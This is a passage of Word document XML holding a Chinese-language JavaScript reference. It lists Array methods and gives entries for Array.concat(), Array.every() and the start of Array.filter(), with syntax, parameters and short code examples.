        <w:t>将数组的所有元素转化为字符串，并衔接起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lastIndexOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在数组中反向查找。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从数组的元素中，计算出新的数组元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>移除数组最后一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>把元素添加到数组尾部。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>从数组的元素中，计算出一个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>reduceRight()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从右到左缩减数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>reverse()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在原数组中颠倒数组元素的顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>移除数组的第一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回数组的一部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>some()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>测试是否至少有一个数组元素能让断言函数为真。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>sort()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在原数组中对数组元素进行排序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>插入、删除或替换数组元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>toLocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将数组转化为本地化字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将数组转化为字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在数组头部插入元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的基本特性，在第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章里有详细阐述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="578" w:name="Array_concat__"/>
      <w:r>
        <w:t>Array.concat()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="578"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>衔接数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.concat(value,...)</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value,...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>任意个要衔接到</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新数组，包含</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，以及衔接的新元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t>会将参数衔接到</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中得到一个新数组并返回。它不会修改</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>。如果传给</w:t>
      </w:r>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t>的某个参数本身是一个数组，则会将该数组的元素衔接到</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中，而不是数组本身。</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a=[1,2,3];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.concat(4,5)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3,4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.concat([4,5]);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3,4,5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.concat([4,5],[6,7])//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3,4,5,6,7]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.concat(4,[5,[6,7]])//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[1,2,3,4,5,[6,7]]</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Array.join()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.push()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.splice()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="579" w:name="Array_every__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Array.every()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="579"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>测试断言函数是否对每个元素为真。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.every(predicate)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.every(predicate,o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用来测试数组元素的断言函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>时的可选</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果对</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的每一个元素调用</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>时都返回真值，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果有任何一个元素调用</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>时返回假值，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</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every()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来测试数组的所有元素是否都满足某些条件。它会按照序号从小到大的顺序遍历</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，并对每个元素调用指定的</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>函数。如果</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>（或任何可以转化为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>的值），则</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>会停止遍历，并立刻返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>的每一次调用都返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。当遍历的数组为空时，</w:t>
      </w:r>
      <w:r>
        <w:t>every()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对数组的每一个序号</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>，调用</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>时带有三个参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>predicate(array[i],i,array)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值会当做布尔值解析。</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>和所有真值表示该数组元素通过了测试或者说满足该函数所描述的条件。如果返回值为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或假值，则表示数组元素没有通过测试。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>更多细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>Array.forEach()</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[1,2,3].every(function(x){return x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>5;})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>所有元素都</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[1,2,3].every(function(x){return x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>3;})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>不是所有元素都＜</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[].every(function(x){return false;});//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:[]</w:t>
      </w:r>
      <w:r>
        <w:t>总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</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Array.filter()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.some()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="580" w:name="Array_filter__"/>
      <w:r>
        <w:t>Array.filter()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="580"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回通过断言的数组元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.map(predicate)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.map(predicate,o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用来判断</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中的元素是否需要包含在返回数组中的调用函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>predicate</w:t>
      </w:r>
      <w:r>
        <w:t>时的可选</w:t>
